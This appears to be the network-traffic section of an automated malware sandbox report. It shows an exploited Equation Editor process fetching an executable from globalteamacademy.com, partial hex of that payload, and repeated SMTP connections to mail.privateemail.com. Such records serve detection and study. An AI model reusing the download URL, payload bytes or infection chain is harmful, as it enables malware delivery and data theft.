                                                                                  Feb 4, 2021 09:20:22.220633030 CET58749172198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:22.220840931 CET58749172198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:22.221297026 CET58749172198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:22.221363068 CET49172587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:22.229510069 CET58749172198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:22.229588032 CET49172587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:22.411371946 CET58749172198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:22.411653996 CET49172587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:22.412477016 CET58749172198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:22.412621021 CET49172587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:22.420573950 CET58749172198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:22.420614004 CET58749172198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:22.420746088 CET49172587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:22.605529070 CET58749172198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:22.605552912 CET58749172198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:22.605561018 CET58749172198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:22.605737925 CET49172587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:22.605807066 CET49172587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:22.614830017 CET58749172198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:22.614850998 CET58749172198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:22.614995956 CET49172587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:22.615063906 CET49172587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:22.796246052 CET58749172198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:22.796267986 CET58749172198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:22.796283007 CET58749172198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:22.796293020 CET58749172198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:22.796345949 CET49172587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:22.796423912 CET49172587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:22.805591106 CET58749172198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:22.805607080 CET58749172198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:22.805614948 CET58749172198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:22.805630922 CET58749172198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:22.805666924 CET49172587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:22.805757046 CET49172587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:22.806286097 CET49172587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:22.988624096 CET58749172198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:22.988650084 CET58749172198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:22.991561890 CET49172587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:22.996552944 CET58749172198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:22.996567965 CET58749172198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:22.996576071 CET58749172198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:22.996851921 CET49172587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:22.996974945 CET49172587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:23.000530958 CET58749172198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:23.000545979 CET58749172198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:23.000552893 CET58749172198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:23.182507038 CET58749172198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:23.187858105 CET58749172198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:23.187871933 CET58749172198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:23.199255943 CET58749172198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:23.412411928 CET49172587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:25.910108089 CET49173587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:26.101701975 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:26.101862907 CET49173587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:26.294228077 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:26.294508934 CET49173587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:26.485302925 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:26.485496044 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:26.486324072 CET49173587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:26.677675009 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:26.678419113 CET49173587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:26.872692108 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:26.872724056 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:26.872744083 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:26.872826099 CET49173587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:26.874481916 CET49173587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:26.882137060 CET49173587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:27.065321922 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:27.065355062 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:27.072945118 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:27.073438883 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:27.074086905 CET49173587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:27.265225887 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:27.266432047 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:27.267160892 CET49173587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:27.458035946 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:27.463735104 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:27.464204073 CET49173587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:27.655080080 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:27.659985065 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:27.660469055 CET49173587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:27.852610111 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:27.885036945 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:27.886023045 CET49173587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:28.077100039 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:28.080363989 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:28.081301928 CET49173587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:28.081855059 CET49173587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:28.082134008 CET49173587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:28.082436085 CET49173587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:28.088896990 CET49173587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:28.272829056 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:28.272856951 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:28.272865057 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:28.272911072 CET49173587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:28.273494959 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:28.273552895 CET49173587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:28.280551910 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:28.280630112 CET49173587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:28.464421034 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:28.464445114 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:28.464627981 CET49173587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:28.464668036 CET49173587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:28.471849918 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:28.471879959 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:28.472074986 CET49173587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:28.472117901 CET49173587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:28.655493021 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:28.655558109 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:28.655620098 CET49173587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:28.655668974 CET49173587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:28.662930965 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:28.663098097 CET49173587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:28.846518040 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:28.846553087 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:28.847208977 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:28.847225904 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:28.847423077 CET49173587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:28.853827953 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:28.853904009 CET49173587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:28.853924036 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:28.854496956 CET49173587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:29.038378954 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:29.038408041 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:29.038422108 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:29.038439989 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:29.038536072 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:29.038999081 CET49173587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:29.044640064 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:29.044663906 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:29.045236111 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:29.045255899 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:29.045373917 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:29.045409918 CET49173587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:29.045453072 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:29.045732975 CET49173587192.168.2.22198.54.122.60
                                                                                  Feb 4, 2021 09:20:29.230170965 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:29.236180067 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:29.236377001 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:29.246267080 CET58749173198.54.122.60192.168.2.22
                                                                                  Feb 4, 2021 09:20:29.450088024 CET49173587192.168.2.22198.54.122.60

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Feb 4, 2021 09:18:51.662632942 CET5219753192.168.2.228.8.8.8
                                                                                  Feb 4, 2021 09:18:51.944529057 CET53521978.8.8.8192.168.2.22
                                                                                  Feb 4, 2021 09:18:51.944935083 CET5219753192.168.2.228.8.8.8
                                                                                  Feb 4, 2021 09:18:52.228024960 CET53521978.8.8.8192.168.2.22
                                                                                  Feb 4, 2021 09:18:52.228461981 CET5219753192.168.2.228.8.8.8
                                                                                  Feb 4, 2021 09:18:52.282907009 CET53521978.8.8.8192.168.2.22
                                                                                  Feb 4, 2021 09:19:55.605703115 CET5309953192.168.2.228.8.8.8
                                                                                  Feb 4, 2021 09:19:55.661979914 CET53530998.8.8.8192.168.2.22
                                                                                  Feb 4, 2021 09:20:01.742530107 CET5283853192.168.2.228.8.8.8
                                                                                  Feb 4, 2021 09:20:01.792295933 CET53528388.8.8.8192.168.2.22
                                                                                  Feb 4, 2021 09:20:01.792803049 CET5283853192.168.2.228.8.8.8
                                                                                  Feb 4, 2021 09:20:01.841451883 CET53528388.8.8.8192.168.2.22
                                                                                  Feb 4, 2021 09:20:03.619554043 CET6120053192.168.2.228.8.8.8
                                                                                  Feb 4, 2021 09:20:03.665203094 CET53612008.8.8.8192.168.2.22
                                                                                  Feb 4, 2021 09:20:03.673604965 CET4954853192.168.2.228.8.8.8
                                                                                  Feb 4, 2021 09:20:03.728008032 CET53495488.8.8.8192.168.2.22
                                                                                  Feb 4, 2021 09:20:10.099528074 CET5562753192.168.2.228.8.8.8
                                                                                  Feb 4, 2021 09:20:10.148149967 CET53556278.8.8.8192.168.2.22
                                                                                  Feb 4, 2021 09:20:10.149142981 CET5562753192.168.2.228.8.8.8
                                                                                  Feb 4, 2021 09:20:10.206562042 CET53556278.8.8.8192.168.2.22
                                                                                  Feb 4, 2021 09:20:19.713848114 CET5600953192.168.2.228.8.8.8
                                                                                  Feb 4, 2021 09:20:19.760186911 CET53560098.8.8.8192.168.2.22
                                                                                  Feb 4, 2021 09:20:19.760864973 CET5600953192.168.2.228.8.8.8
                                                                                  Feb 4, 2021 09:20:19.817013025 CET53560098.8.8.8192.168.2.22
                                                                                  Feb 4, 2021 09:20:25.793689966 CET6186553192.168.2.228.8.8.8
                                                                                  Feb 4, 2021 09:20:25.850912094 CET53618658.8.8.8192.168.2.22
                                                                                  Feb 4, 2021 09:20:25.851789951 CET6186553192.168.2.228.8.8.8
                                                                                  Feb 4, 2021 09:20:25.908576012 CET53618658.8.8.8192.168.2.22

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                  Feb 4, 2021 09:18:51.662632942 CET192.168.2.228.8.8.80x70c0Standard query (0)globalteamacademy.comA (IP address)IN (0x0001)
                                                                                  Feb 4, 2021 09:18:51.944935083 CET192.168.2.228.8.8.80x70c0Standard query (0)globalteamacademy.comA (IP address)IN (0x0001)
                                                                                  Feb 4, 2021 09:18:52.228461981 CET192.168.2.228.8.8.80x70c0Standard query (0)globalteamacademy.comA (IP address)IN (0x0001)
                                                                                  Feb 4, 2021 09:19:55.605703115 CET192.168.2.228.8.8.80x6b76Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                                  Feb 4, 2021 09:20:01.742530107 CET192.168.2.228.8.8.80x8604Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                                  Feb 4, 2021 09:20:01.792803049 CET192.168.2.228.8.8.80x8604Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                                  Feb 4, 2021 09:20:10.099528074 CET192.168.2.228.8.8.80xa5a5Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                                  Feb 4, 2021 09:20:10.149142981 CET192.168.2.228.8.8.80xa5a5Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                                  Feb 4, 2021 09:20:19.713848114 CET192.168.2.228.8.8.80x6cc0Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                                  Feb 4, 2021 09:20:19.760864973 CET192.168.2.228.8.8.80x6cc0Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                                  Feb 4, 2021 09:20:25.793689966 CET192.168.2.228.8.8.80xe8f4Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                                  Feb 4, 2021 09:20:25.851789951 CET192.168.2.228.8.8.80xe8f4Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                  Feb 4, 2021 09:18:51.944529057 CET8.8.8.8192.168.2.220x70c0No error (0)globalteamacademy.com43.252.37.193A (IP address)IN (0x0001)
                                                                                  Feb 4, 2021 09:18:52.228024960 CET8.8.8.8192.168.2.220x70c0No error (0)globalteamacademy.com43.252.37.193A (IP address)IN (0x0001)
                                                                                  Feb 4, 2021 09:18:52.282907009 CET8.8.8.8192.168.2.220x70c0No error (0)globalteamacademy.com43.252.37.193A (IP address)IN (0x0001)
                                                                                  Feb 4, 2021 09:19:55.661979914 CET8.8.8.8192.168.2.220x6b76No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                                  Feb 4, 2021 09:20:01.792295933 CET8.8.8.8192.168.2.220x8604No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                                  Feb 4, 2021 09:20:01.841451883 CET8.8.8.8192.168.2.220x8604No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                                  Feb 4, 2021 09:20:10.148149967 CET8.8.8.8192.168.2.220xa5a5No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                                  Feb 4, 2021 09:20:10.206562042 CET8.8.8.8192.168.2.220xa5a5No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                                  Feb 4, 2021 09:20:19.760186911 CET8.8.8.8192.168.2.220x6cc0No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                                  Feb 4, 2021 09:20:19.817013025 CET8.8.8.8192.168.2.220x6cc0No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                                  Feb 4, 2021 09:20:25.850912094 CET8.8.8.8192.168.2.220xe8f4No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                                  Feb 4, 2021 09:20:25.908576012 CET8.8.8.8192.168.2.220xe8f4No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)

                                                                                  HTTP Request Dependency Graph

                                                                                  • globalteamacademy.com

                                                                                  HTTP Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  0192.168.2.224916743.252.37.19380C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Feb 4, 2021 09:18:52.501035929 CET1OUTGET /docct/pal/g1OsYVWymzBgTTt.exe HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                  Host: globalteamacademy.com
                                                                                  Connection: Keep-Alive
                                                                                  Feb 4, 2021 09:18:52.713819027 CET2INData Raw: 26 00 00 01 0a 2b 00 06 2a 00 00 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 08 00 00 04 14 28 41 00 00 0a 0b 07 2c 21 72 4f 00 00 70 d0 06 00 00 02 28 42 00 00 0a 6f 43 00 00 0a 73 44 00 00 0a 0c 08 80 08 00 00 04 00 00 7e 08 00 00 04 0a 2b 00 06
                                                                                  Data Ascii: &+*0<~(A,!rOp(BoCsD~+*0~+*"*0&(rp~oE(Ft&+*s(Gts@(F*(H*0(oI,(
                                                                                  Feb 4, 2021 09:18:52.713841915 CET3INData Raw: 0c 20 ed 01 00 00 73 66 00 00 0a 6f 67 00 00 0a 00 02 6f 25 00 00 06 72 5e 02 00 70 6f 68 00 00 0a 00 02 6f 25 00 00 06 1f 62 1f 1d 73 69 00 00 0a 6f 6a 00 00 0a 00 02 6f 25 00 00 06 1f 1a 6f 6b 00 00 0a 00 02 6f 25 00 00 06 72 6e 02 00 70 6f 71
                                                                                  Data Ascii: sfogo%r^poho%bsiojo%oko%rnpoqo%opo'oeo' Vsfogo'rxpoho' 9lsiojo'oko'rpolo)rpomtono)
                                                                                  Feb 4, 2021 09:18:52.713854074 CET5INData Raw: 28 86 00 00 0a 00 02 20 c9 03 00 00 20 10 02 00 00 73 69 00 00 0a 28 87 00 00 0a 00 02 28 88 00 00 0a 02 6f 33 00 00 06 6f 89 00 00 0a 00 02 28 88 00 00 0a 02 6f 31 00 00 06 6f 89 00 00 0a 00 02 28 88 00 00 0a 02 6f 2f 00 00 06 6f 89 00 00 0a 00
                                                                                  Data Ascii: ( si((o3o(o1o(o/o(o-o(o+o(o'o(o)o(o%o(o!o(o#o(oo(oo
                                                                                  Feb 4, 2021 09:18:52.713865995 CET6INData Raw: 00 0a 26 08 14 72 04 05 00 70 17 8d 19 00 00 01 25 16 02 7b 26 00 00 04 1b 6f 9e 00 00 0a a2 14 14 14 17 28 9f 00 00 0a 26 08 14 72 04 05 00 70 17 8d 19 00 00 01 25 16 02 7b 26 00 00 04 1c 6f 9e 00 00 0a a2 14 14 14 17 28 9f 00 00 0a 26 00 14 0c
                                                                                  Data Ascii: &rp%{&o(&rp%{&o(&{&o:{!o*&(C*f(oo(*J(oo*0^{!orp{!s}"rprp (
                                                                                  Feb 4, 2021 09:18:52.713877916 CET7INData Raw: 55 00 00 0a 7d 3f 00 00 04 02 73 56 00 00 0a 7d 40 00 00 04 02 73 57 00 00 0a 7d 42 00 00 04 02 73 58 00 00 0a 7d 43 00 00 04 02 28 4c 00 00 06 00 2a 00 1b 30 02 00 31 00 00 00 09 00 00 11 00 00 03 2c 0b 02 7b 27 00 00 04 14 fe 03 2b 01 16 0a 06
                                                                                  Data Ascii: U}?sV}@sW}BsX}C(L*01,{'+,{'oY(Z*$%0H(Bs[s\oNs\oPs]oRsoTsoVs\oXs\oZ
                                                                                  Feb 4, 2021 09:18:52.713898897 CET9INData Raw: 6f 67 00 00 0a 00 02 6f 5b 00 00 06 72 e7 07 00 70 6f 68 00 00 0a 00 02 6f 5b 00 00 06 20 92 00 00 00 1f 3d 73 69 00 00 0a 6f 6a 00 00 0a 00 02 6f 5b 00 00 06 16 6f 6b 00 00 0a 00 02 6f 5d 00 00 06 6f 88 00 00 0a 02 6f 77 00 00 06 6f 89 00 00 0a
                                                                                  Data Ascii: ogo[rpoho[ =siojo[oko]oowoo]oouoo]oo_oo]ooaoo]oocoo]ooeoo]oogoo]ooio
                                                                                  Feb 4, 2021 09:18:52.713958025 CET10INData Raw: e7 00 00 00 1f 3d 73 69 00 00 0a 6f 6a 00 00 0a 00 02 6f 6d 00 00 06 16 6f 6b 00 00 0a 00 02 6f 6f 00 00 06 1f 12 20 9c 00 00 00 73 66 00 00 0a 6f 67 00 00 0a 00 02 6f 6f 00 00 06 72 4c 02 00 70 6f 68 00 00 0a 00 02 6f 6f 00 00 06 20 9e 00 00 00
                                                                                  Data Ascii: =siojomokoo sfogoorLpohoo =siojoookoq(yozoqo}oqo~oq sfogoqrpohoq siojoqokoqo
                                                                                  Feb 4, 2021 09:18:52.713985920 CET12INData Raw: 03 7d 3a 00 00 04 2a 26 02 7b 3b 00 00 04 2b 00 2a 13 30 02 00 37 00 00 00 0e 00 00 11 02 fe 06 7f 00 00 06 73 53 00 00 0a 0a 02 7b 3b 00 00 04 0b 07 2c 07 07 06 6f 94 00 00 0a 02 03 7d 3b 00 00 04 02 7b 3b 00 00 04 0b 07 2c 07 07 06 6f 95 00 00
                                                                                  Data Ascii: }:*&{;+*07sS{;,o};{;,o*&{<+*"}<*&{=+*"}=*&{>+*"}>*0{?o{@{?orpooqoo{@o}D+Yoq
                                                                                  Feb 4, 2021 09:18:52.714015007 CET13INData Raw: 11 04 2c 0e 72 d6 0b 00 70 16 14 28 bd 00 00 0a 26 00 00 02 7b 3f 00 00 04 6f a4 00 00 0a 00 02 28 a6 00 00 0a 00 28 09 00 00 06 6f 0a 03 00 06 6f 09 02 00 06 00 2a 26 00 02 28 a6 00 00 0a 00 2a 56 72 ea 0b 00 70 80 45 00 00 04 72 4c 0c 00 70 80
                                                                                  Data Ascii: ,rp(&{?o((oo*&(*VrpErLpF*(@*Z(@((&*0mrjporp((rp( %%%~E%~F%rpo& +*
                                                                                  Feb 4, 2021 09:18:52.918039083 CET15INData Raw: 70 6f d1 00 00 0a 14 fe 03 0d 09 2c 22 02 28 c5 00 00 0a 07 6f c5 00 00 0a 72 52 0d 00 70 6f d1 00 00 0a 73 59 03 00 06 6f d2 00 00 0a 00 00 00 07 6f c5 00 00 0a 72 62 0d 00 70 6f d1 00 00 0a 14 fe 03 13 04 11 04 2c 22 02 28 c5 00 00 0a 07 6f c5
                                                                                  Data Ascii: po,"(orRposYoorbpo,"(orbpos|oor~po,"(or~posoo(o(o(o(o(o(
                                                                                  Feb 4, 2021 09:18:52.918178082 CET18INHTTP/1.1 200 OK
                                                                                  Date: Thu, 04 Feb 2021 08:18:53 GMT
                                                                                  Server: Apache
                                                                                  Last-Modified: Wed, 03 Feb 2021 23:07:52 GMT
                                                                                  Accept-Ranges: bytes
                                                                                  Content-Length: 1076224
                                                                                  Keep-Alive: timeout=5, max=100
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: application/x-msdownload
                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 36 2b 1b 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 50 0c 00 00 1a 04 00 00 00 00 00 0a 6e 0c 00 00 20 00 00 00 80 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 10 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b8 6d 0c 00 4f 00 00 00 00 80 0c 00 18 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 10 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 10 4e 0c 00 00 20 00 00 00 50 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 18 16 04 00 00 80 0c 00 00 18 04 00 00 52 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 10 00 00 02 00 00 00 6a 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ec 6d 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 f0 87 01 00 10 6a 01 00 03 00 00 00 01 00 00 06 00 f2 02 00 b8 7b 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 2c 00 00 0a 28 2d 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 2e 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 2f 00 00 0a 00 02 16 28 30 00 00 0a 00 02 17 28 31 00 00 0a 00 02 17 28 32 00 00 0a 00 02 16 28 33 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 10 03 00 06 28 34 00 00 0a 00 2a 26 00 02 28 35 00 00 0a 00 2a ce 73 36 00 00 0a 80 01 00 00 04 73 37 00 